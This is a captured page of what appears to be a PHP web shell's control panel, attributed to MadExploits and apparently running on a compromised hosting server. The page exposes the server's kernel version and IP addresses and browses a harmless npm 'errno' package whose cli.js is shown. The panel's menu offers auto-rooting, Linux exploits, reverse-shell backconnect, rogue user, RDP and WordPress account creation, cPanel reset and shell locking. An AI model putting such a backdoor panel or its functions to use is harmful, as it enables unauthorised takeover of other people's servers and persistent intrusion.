Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.216.36
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
node_modules /
npm /
node_modules /
errno /
[ HOME SHELL ]
Name
Size
Permission
Action
.travis.yml
77
B
-rw-r--r--
README.md
4.59
KB
-rw-r--r--
build.js
1.11
KB
-rw-r--r--
cli.js
440
B
-rw-r--r--
custom.js
1.62
KB
-rw-r--r--
errno.js
5.48
KB
-rw-r--r--
package.json
1.5
KB
-rw-r--r--
test.js
2.58
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cli.js
#!/usr/bin/env node var errno = require('./') , arg = process.argv[2] , data, code if (arg === undefined) { console.log(JSON.stringify(errno.code, null, 2)) process.exit(0) } if ((code = +arg) == arg) data = errno.errno[code] else data = errno.code[arg] || errno.code[arg.toUpperCase()] if (data) console.log(JSON.stringify(data, null, 2)) else { console.error('No such errno/code: "' + arg + '"') process.exit(1) }
Close